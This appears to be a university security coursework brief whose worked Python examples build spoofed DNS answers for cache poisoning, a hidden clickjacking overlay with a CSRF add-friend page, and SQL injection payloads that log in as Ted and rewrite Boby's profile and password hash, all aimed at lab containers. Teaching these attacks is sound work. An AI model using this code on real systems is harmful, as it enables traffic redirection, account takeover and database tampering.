Reference no: EM134013358
IT Infrastructure and Security
Overview
The objective of Assignment 2 is to evaluate your knowledge of the topics covered by Lectures 1-11. You are required to prepare the solutions (a recording where required, and reports with screenshots and explanations), then upload them as a single ZIP file to Canvas.
Learning outcome 1: Describe all of the IT Infrastructure Architecture components and the issues relating to each of them.
Learning outcome 2: Demonstrate knowledge of higher level aspects of data communication and networking appropriate for the development of software applications in a networked environment and design simple computer scripts that are aware of basic aspects of networking.
Learning outcome 3: Analyse and determine an appropriate enterprise networking system and secure web server configuration based on stated user needs.
Learning outcome 4: Describe and review emerging networking and security technologies within the broader field of information technology and system environments.
Section 1: Exploring Domain Name Services (DNS) and its Security
DNS (Domain Name System) is the Internet's phone book: it translates hostnames to IP addresses (and vice versa). The translation is done by DNS resolution, which happens behind the scenes. DNS attacks manipulate this resolution process in various ways with the intent of misdirecting users to alternative destinations, which are often malicious. Suppose Figure 1 depicts the environment of your company's network, which comprises four separate machines: one for the victim, one for the local DNS server, and two for the attacker.
Assume you are configuring your company network's DNS services. Work through the test cases in the following sub-questions to check the functionality and security of those DNS services. Use the Labsetup files from Lab 7 to construct the network.
Write a report for the following sub-questions with screenshots and explanations, as well as a video recording to demonstrate.
Tips-1: Use the command $ docker system prune -a -f when encountering the error "Cannot create the container for service attacker: Conflict. ... container name .. is already in use".
Tips-2: IP_1 is derived from the last four digits of your student number. If your student number is s3123456, then IP_1 is 3.4.5.6. Demonstrate that your protection succeeds and briefly describe your protection.
Tips-3: You may consider the demonstration in Week 6's Lecture and Week7's Tutorial as an example.
Q1.1 Write Linux commands to find out the IP address of www.example.com. Walk through the entire DNS lookup step by step, the way a resolver does it: query the root name server "a.root-servers.net" by its IP address for the first layer of the lookup, then follow each referral (the TLD server, then the authoritative server for example.com) until you receive the answer. Note that this manual walk is an iterative lookup; the recursive form is what a stub resolver asks its local DNS server to perform on its behalf (dig +trace automates the same walk and is a useful cross-check of your manual steps).
Q1.2 Based on your screenshots of DNS lookup in Q1.1, please explain the DNS response packets.
Q1.4 When a user types the name of a web site (a host name, such as www.example.com) into a web browser, the user's computer sends a DNS request to the local DNS server to resolve the IP address of the host name. An attacker who can sniff that DNS request can immediately craft a fake DNS response and send it back to the user's machine. The fake response is accepted if it arrives before the genuine one and matches what the user's resolver expects: the transaction ID, the question section, and the IP addresses and UDP ports of the request (reversed).
Write a program to launch such an attack. A code skeleton is provided in the file dns-spoof-1.py. The fake IP address should be IP_1. Demonstrate that your attack has been launched successfully.
Q1.5 When a local DNS server receives a query, it first looks for the answer in its own cache; if the answer is there, the DNS server simply replies with the information from its cache. If the answer is not in the cache, the DNS server tries to get the answer from other DNS servers. When it gets the answer, it stores the answer in the cache, so next time there is no need to ask other DNS servers.
Modify the program dns-spoof-1.py from Q1.4 to perform this DNS cache poisoning attack. The attacker spoofs the response (fake IP_1 for www.example.com) that the local DNS server expects from the other DNS servers; the local DNS server keeps the spoofed response in its cache for the TTL carried in that response. The next time a user's machine asks to resolve the same host name, it gets the spoofed answer from the cache. Demonstrate that your attack has been launched successfully. Before attacking, make sure the DNS server's cache is empty with the Linux command $ rndc flush; after attacking, $ rndc dumpdb -cache writes the cache to the dump file configured in named.conf, where the poisoned record should appear.
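As an added example for Q1.2, Q1.4 and Q1.5 (this is not the dns-spoof-1.py skeleton, which is not reproduced on this page), the following Python builds the DNS-layer bytes of a query, of the spoofed answer sent to the victim, and of the authoritative-looking answer aimed at the local DNS server's cache, and decodes responses field by field so each header flag and record can be explained. It uses only the standard library so it runs offline; the returned bytes are what goes in the UDP payload. Assumptions: the lab skeleton is Scapy-based and handles the sniffing and the sending with a spoofed source address, IP_1 is 3.4.5.6 (the value for the example student number s3123456), and the transaction ID and TTL values are constructed.

```python
"""DNS query/response construction and decoding with the standard library only.

Added example for Q1.2, Q1.4 and Q1.5 (not the lab's dns-spoof-1.py skeleton).
"""
import socket
import struct

FAKE_IP = "3.4.5.6"      # IP_1 for the example student number s3123456 (assumption)
LONG_TTL = 259200        # 3 days: how long a poisoned entry should be served (constructed)


def encode_name(name):
    """'www.example.com' -> b'\\x03www\\x07example\\x03com\\x00' (RFC 1035 labels)."""
    out = b""
    for label in name.rstrip(".").split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"


def decode_name(data, offset):
    """Decode a name at offset, following compression pointers; returns (name, next_offset)."""
    labels = []
    while True:
        length = data[offset]
        if length & 0xC0 == 0xC0:                    # pointer to a name earlier in the packet
            ptr = struct.unpack("!H", data[offset:offset + 2])[0] & 0x3FFF
            labels.append(decode_name(data, ptr)[0])
            return ".".join(labels), offset + 2
        offset += 1
        if length == 0:
            return ".".join(labels), offset
        labels.append(data[offset:offset + length].decode("ascii"))
        offset += length


def build_query(txid, qname, qtype=1):
    """Standard query with RD=1 for an A record, as the victim's stub resolver sends it."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    return header + encode_name(qname) + struct.pack("!HH", qtype, 1)


def parse_query(data):
    """Pull out the two things a spoofed reply must copy: the ID and the question section."""
    txid = struct.unpack("!H", data[:2])[0]
    qname, off = decode_name(data, 12)
    return {"id": txid, "qname": qname, "question": data[12:off + 4]}


def a_record(name, ip, ttl):
    """Resource record: NAME, TYPE=A(1), CLASS=IN(1), TTL, RDLENGTH=4, RDATA=IPv4."""
    return encode_name(name) + struct.pack("!HHIH", 1, 1, ttl, 4) + socket.inet_aton(ip)


def build_spoofed_response(query, fake_ip=FAKE_IP, ttl=LONG_TTL, authoritative=False):
    """Fake reply to a sniffed query (Q1.4). The resolver accepts it only if the
    transaction ID and question match the query it sent, so both are copied.
    For cache poisoning (Q1.5) the same payload answers the local DNS server's
    own outgoing query, with AA set and a long TTL so the server caches it."""
    q = parse_query(query)
    flags = 0x8400 if authoritative else 0x8180   # QR=1,AA=1  /  QR=1,RD=1,RA=1; RCODE=0
    header = struct.pack("!HHHHHH", q["id"], flags, 1, 1, 0, 0)
    return header + q["question"] + a_record(q["qname"], fake_ip, ttl)


def parse_response(data):
    """Decode header flags, question and every resource record (for Q1.2)."""
    txid, flags, qd, an, ns, ar = struct.unpack("!HHHHHH", data[:12])
    off, questions, records = 12, [], []
    for _ in range(qd):
        name, off = decode_name(data, off)
        qtype, qclass = struct.unpack("!HH", data[off:off + 4])
        off += 4
        questions.append((name, qtype, qclass))
    for section in ["answer"] * an + ["authority"] * ns + ["additional"] * ar:
        name, off = decode_name(data, off)
        rtype, rclass, ttl, rdlen = struct.unpack("!HHIH", data[off:off + 10])
        off += 10
        rdata = data[off:off + rdlen]
        if rtype == 1 and rdlen == 4:
            rdata = socket.inet_ntoa(rdata)
        elif rtype in (2, 5):                        # NS / CNAME carry a (maybe compressed) name
            rdata = decode_name(data, off)[0]
        off += rdlen
        records.append({"section": section, "name": name, "type": rtype,
                        "ttl": ttl, "rdata": rdata})
    return {"id": txid, "qr": flags >> 15, "aa": (flags >> 10) & 1, "rcode": flags & 0xF,
            "questions": questions, "records": records}


if __name__ == "__main__":
    sniffed = build_query(0x1234, "www.example.com")          # stands in for the sniffed packet
    print(parse_response(build_spoofed_response(sniffed)))
    print(parse_response(build_spoofed_response(sniffed, authoritative=True)))
```

For Q1.4 the reply must appear to come from the local DNS server's address and port 53 and be addressed to the source port the victim's query used. For Q1.5 the attacker instead watches the traffic between the local DNS server and the upstream servers, answers the server's own outgoing query for www.example.com with the authoritative=True variant while spoofing the upstream server's address, and checks the result with rndc dumpdb -cache; the TTL decides how long the poisoned entry is served. Either attack depends on seeing the query, since the transaction ID and source port are otherwise unknown.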
Section 2: Web Client and Security
The client side of the web infrastructure interacts directly with users and is vulnerable to various attacks, such as phishing and cross-site scripting. This section involves a victim user, a trusted site (www.seed-server.com), and a malicious site. Students will attack a social-networking web application (Elgg) with a CSRF attack. The website's Docker setup is based on the Labsetup from Lab 8. To perform the attack, students first need to create a phishing website from the provided RMIT.zip.
Understanding secure web applications often requires knowledge of database management system (DBMS) concepts and client-server interactions.
Figure: Elgg website
We have created several user accounts on the Elgg server; the user name and passwords are given in the following.
UserName    Password
admin       seedelgg
alice       seedalice
boby        seedboby
charlie     seedcharlie
samy        seedsamy
Write a report for the following sub-questions with screenshots and explanations, as well as a video recording to demonstrate.
Tips-1: Use the command $ docker system prune -a -f when encountering the error "Cannot create the container for service attacker: Conflict. ... container name .. is already in use".
Q2.1 Create a phishing website "https://www.attacker32.com/" using an iframe that emulates RMIT's homepage but contains a malicious button (to be made invisible in Q2.2) on top of the "Courses" link, as shown in Figure 3. Once the victim user clicks the "Malicious button", the page is redirected to "https://www.attacker32.com/addfriend.html". The "Malicious button" should be labelled with your student number, e.g. "Malicious button s31234567".
Tips-1: Students can put the unzipped RMIT.zip website into "attacker" folder in Labsetup.
Tips-2: Students can modify the "attacker/index.html" to make it as a phishing website.
Tips-3: If you get a 403 Forbidden error, the web server's user cannot read the copied RMIT files. Making them world-readable is enough: $ sudo chmod -R a+rX <RMIT folder> (755 for directories, 644 for files). The often-suggested $ sudo chmod -R 4777 .. also clears the error, but it sets the setuid bit and makes everything world-writable, and the trailing ".." applies it to the parent directory, so use it only inside the throwaway lab container.
Q2.2 Modify the phishing website from Q2.1 to make the "Malicious button" and the iframe invisible. Modify the CSS of the button and iframe tags: opacity: 0 hides an element while it still receives clicks, whereas display: none or visibility: hidden would stop the button from being clickable.
Q2.3 Now we need two people in the Elgg social network, Boby and Samy. Samy wants to become Boby's friend, but Boby refuses to add him to the friend list. Samy decides to use a CSRF attack to achieve his goal. He sends Boby a URL (via an email or a post in Elgg); Boby, curious, clicks on the URL, which leads to Samy's web site: www.attacker32.com.
Pretend that you are Samy and demonstrate how to construct the content of the web page so that, as soon as Boby visits it, Samy is added to Boby's friend list (assuming Boby has an active session with Elgg).
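The following Python is an added example for Q2.1 to Q2.3, not the lab's code or the contents of RMIT.zip: it generates the two attacker pages (the overlay page for index.html and the CSRF page for addfriend.html) and includes a check of whether a response can be framed at all, which is why a locally served copy of the RMIT site works as the decoy. Assumptions: the unzipped RMIT site lives at rmit/index.html under the attacker folder, the Elgg add-friend action is a GET to /action/friends/add?friend=<GUID> with no CSRF token (capture a real add-friend request in the browser's developer tools to confirm the URL and Samy's GUID before relying on it), and the pixel offset of the "Courses" link is measured in the browser rather than known in advance.

```python
"""Attacker pages for Section 2 (Q2.1/Q2.2 overlay page, Q2.3 CSRF page) and a
framing check. Added example; every URL, path and offset below is an assumption.
"""
import html
import os

TRUSTED_SITE = "http://www.seed-server.com"
ATTACKER_SITE = "https://www.attacker32.com"
FRAMED_PAGE = "rmit/index.html"                                   # assumption: unzipped RMIT.zip
COURSES_LINK = {"top": 60, "left": 300, "width": 90, "height": 30}  # assumption: measure in dev tools


def clickjacking_page(student_no, show_button=True, show_iframe=True,
                      target=f"{ATTACKER_SITE}/addfriend.html"):
    """Q2.1 with both flags True, Q2.2 with both False. The iframe shows the copied
    RMIT page; the button sits over the Courses link with a higher z-index, so the
    click lands on the button. opacity: 0 hides an element but keeps it clickable."""
    button_css = "opacity: 1; border: 2px solid red;" if show_button else "opacity: 0;"
    iframe_css = "" if show_iframe else "opacity: 0;"
    label = html.escape(f"Malicious button {student_no}")
    box = COURSES_LINK
    return f"""<!DOCTYPE html>
<html><head><meta charset="utf-8"><title>RMIT University</title>
<style>
  body {{ margin: 0; }}
  #decoy {{ position: absolute; top: 0; left: 0; width: 100vw; height: 100vh;
            border: 0; z-index: 1; {iframe_css} }}
  #bait  {{ position: absolute; top: {box['top']}px; left: {box['left']}px;
            width: {box['width']}px; height: {box['height']}px;
            z-index: 2; {button_css} }}
</style></head>
<body>
  <iframe id="decoy" src="{FRAMED_PAGE}"></iframe>
  <button id="bait" onclick="window.location='{target}'">{label}</button>
</body></html>
"""


def csrf_page(samy_guid):
    """Q2.3: rendering this page makes Boby's browser send the add-friend GET to the
    trusted site with Boby's session cookie attached, so Elgg treats it as Boby's
    own request. A 1x1 image issues the request without anything visible."""
    url = f"{TRUSTED_SITE}/action/friends/add?friend={int(samy_guid)}"
    return f"""<!DOCTYPE html>
<html><head><meta charset="utf-8"><title>Cute cat pictures</title></head>
<body>
  <h1>Loading...</h1>
  <img src="{url}" width="1" height="1" alt="">
</body></html>
"""


def framing_allowed(headers, attacker_origin=ATTACKER_SITE):
    """Can attacker_origin put this response in an iframe? A CSP frame-ancestors
    directive wins when present; otherwise X-Frame-Options decides; neither header
    means framing is allowed. Simplified: exact origin match only."""
    h = {k.lower(): v for k, v in headers.items()}
    for directive in h.get("content-security-policy", "").split(";"):
        parts = directive.split()
        if parts and parts[0].lower() == "frame-ancestors":
            sources = [s.strip("'").lower() for s in parts[1:]]
            return "*" in sources or attacker_origin.lower() in sources
    return h.get("x-frame-options", "").strip().upper() not in ("DENY", "SAMEORIGIN")


def write_pages(folder, student_no, samy_guid):
    """Write the Q2.2 version of index.html and addfriend.html into the attacker folder."""
    os.makedirs(folder, exist_ok=True)
    pages = {"index.html": clickjacking_page(student_no, show_button=False, show_iframe=False),
             "addfriend.html": csrf_page(samy_guid)}
    for name, content in pages.items():
        with open(os.path.join(folder, name), "w", encoding="utf-8") as fh:
            fh.write(content)
    return sorted(pages)


if __name__ == "__main__":
    print(write_pages("attacker", "s31234567", 59))   # 59 is a placeholder GUID, not Samy's real one
```

Before filing the attack pages, fetch the page you intend to frame and run its response headers through framing_allowed: a DENY or SAMEORIGIN X-Frame-Options, or a CSP frame-ancestors that excludes www.attacker32.com, means the browser will refuse to render it in your iframe, which is why the local copy from RMIT.zip is used rather than the live site. The CSRF page likewise depends on the browser attaching Boby's Elgg cookie to a cross-site image request; a session cookie marked SameSite=Lax or Strict is not sent on that request and the attack fails.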
Section 3: Web Server and Security
SQL injection is a code injection technique that exploits vulnerabilities in the interface between web applications and database servers. For this section we have created a web application, provided in the Labsetup Docker from Lab 9, which is vulnerable to SQL injection.
Assume you are an attacker who attempts to exploit the web application without knowing any user's password. Conduct the SQL injection attacks described in the following sub-questions.
Write a report for the following sub-questions with screenshots and explanations, as well as a video recording to demonstrate.
Q3.1 In the above SQL statement, the variable $input_uname holds the string typed into the Username textbox and $hashed_pwd holds the hash of the string typed into the Password textbox. Both values are placed directly into the SQL query string, which leaves the SELECT query vulnerable to SQL injection. Exploit the vulnerability to log into Ted's account without knowing the correct password. Demonstrate that your attack succeeds and explain it in terms of the SQL statement the server actually executes.
You also need to make an unauthorised modification to the database. Your goal is to modify another user's profile using SQL injections. In this web application, if users want to update their profiles, they can click the Edit Profile link on the navigation bar, and then fill out a form to update the profile information.
Q3.2 In Q3.1 you exploited the web application and logged in as Ted. Now exploit the vulnerability in the UPDATE SQL statement behind the Edit Profile form, from Ted's account, to change Boby's nickname to your student name, email to your RMIT student email, and address to "RMIT", without knowing Ted's or Boby's password. Demonstrate that your attack succeeds and explain it in terms of the SQL statement the server actually executes.
Q3.3 In Q3.1 you exploited the web application and logged in as Ted. Now exploit the vulnerability in the same UPDATE SQL statement, from Ted's account, to change Boby's password to PWD_1 without knowing Ted's or Boby's password. Note that passwords are stored as SHA1 hashes in this application, so you must inject the SHA1 hash of PWD_1, not the plaintext. You can compute the hash with an online tool or locally (e.g. sha1sum); if you do it on the command line, make sure no trailing newline is hashed (echo -n), or the hash will not match what the login form computes. Demonstrate that your attack succeeds and explain it in terms of the SQL statement the server actually executes.
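The following Python is an added example for Q3.1 to Q3.3, not the lab's PHP application: it rebuilds the two vulnerable statements (login SELECT, Edit Profile UPDATE) over an in-memory SQLite database, runs the three payloads against them, and shows the parameterised form on which the same payloads are just data. The table, column and user names, the sample passwords, and the placeholders for your student name, email and PWD_1 are all constructed to mirror the pattern the questions describe; they are not the lab's real schema or data. One caveat the example makes explicit: the lab's MySQL treats # (and "-- " with a space) as a line comment, while SQLite, used here so the example runs offline, only accepts --, so the comment terminator in each payload must match the DBMS you are attacking.

```python
"""SQL injection in the login SELECT and profile UPDATE (Q3.1-Q3.3), on SQLite.

Added example, not the lab's code. Schema, users, passwords and the three
placeholder values below are constructed. MySQL (the lab) accepts '#' as a
comment; SQLite needs '--', which is what these payloads use.
"""
import hashlib
import sqlite3

STUDENT_NAME = "Your Name"                       # placeholder for your student name
STUDENT_EMAIL = "sXXXXXXX@student.rmit.edu.au"   # placeholder for your RMIT student email
PWD_1 = "PWD_1"                                  # placeholder for the password the assignment defines


def sha1(password):
    """Unsalted SHA1, as the vulnerable application stores passwords (weak, but what it uses)."""
    return hashlib.sha1(password.encode()).hexdigest()


def setup_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE credential (ID INTEGER PRIMARY KEY, Name TEXT, NickName TEXT, "
                 "Email TEXT, Address TEXT, Password TEXT)")
    conn.executemany("INSERT INTO credential VALUES (?, ?, ?, ?, ?, ?)", [
        (1, "Ted", "ted", "ted@example.com", "1 Ted St", sha1("ted-secret")),        # constructed
        (2, "Boby", "boby", "boby@example.com", "2 Boby St", sha1("boby-secret")),   # constructed
    ])
    return conn


def vulnerable_login(conn, input_uname, input_pwd):
    """Inputs are concatenated into the query string: the flaw behind Q3.1."""
    hashed_pwd = sha1(input_pwd)
    sql = (f"SELECT ID, Name FROM credential "
           f"WHERE Name='{input_uname}' AND Password='{hashed_pwd}'")
    return conn.execute(sql).fetchall()


def vulnerable_update(conn, user_id, nickname, email, address, password=""):
    """Edit Profile handler: WHERE uses the logged-in user's ID, but the SET values
    come straight from the form, so a quote in the nickname field rewrites the rest
    of the statement (Q3.2/Q3.3). Returns the SQL actually executed, for the report."""
    sql = f"UPDATE credential SET NickName='{nickname}', Email='{email}', Address='{address}'"
    if password:
        sql += f", Password='{sha1(password)}'"
    sql += f" WHERE ID={user_id}"
    conn.execute(sql)
    return sql


def safe_login(conn, input_uname, input_pwd):
    """Hardened form: a parameterised query, so the same payloads are only data."""
    return conn.execute("SELECT ID, Name FROM credential WHERE Name=? AND Password=?",
                        (input_uname, sha1(input_pwd))).fetchall()


def profile(conn, name):
    cols = ("NickName", "Email", "Address", "Password")
    row = conn.execute(f"SELECT {', '.join(cols)} FROM credential WHERE Name=?", (name,)).fetchone()
    return dict(zip(cols, row))


# Q3.1: close the string literal, then comment out the password check.
LOGIN_PAYLOAD = "Ted'--"

# Q3.2: from Ted's session, overwrite Boby's fields and retarget the WHERE clause.
PROFILE_PAYLOAD = (f"{STUDENT_NAME}', Email='{STUDENT_EMAIL}', Address='RMIT' "
                   f"WHERE Name='Boby'--")

# Q3.3: same technique, injecting the SHA1 of PWD_1 into the Password column
# (side effect: Boby's NickName becomes the empty string).
PASSWORD_PAYLOAD = f"', Password='{sha1(PWD_1)}' WHERE Name='Boby'--"

if __name__ == "__main__":
    conn = setup_db()
    print(vulnerable_login(conn, LOGIN_PAYLOAD, "anything"))   # Ted's row, no password known
    print(safe_login(conn, LOGIN_PAYLOAD, "anything"))         # empty: payload is just a name
    print(vulnerable_update(conn, 1, PROFILE_PAYLOAD, "", ""))
    print(profile(conn, "Boby"))
    print(vulnerable_update(conn, 1, PASSWORD_PAYLOAD, "", ""))
    print(vulnerable_login(conn, "Boby", PWD_1))               # Boby's row with the new password
```

The string returned by vulnerable_update is the statement to paste into your report's explanation: everything after the injected -- (the original Email, Address and WHERE ID clause) is discarded, which is why Ted's row is untouched and Boby's is rewritten. On the lab's MySQL, replace the trailing -- in each payload with # and check, as the hardened safe_login shows, that a parameterised query returns nothing for the same input.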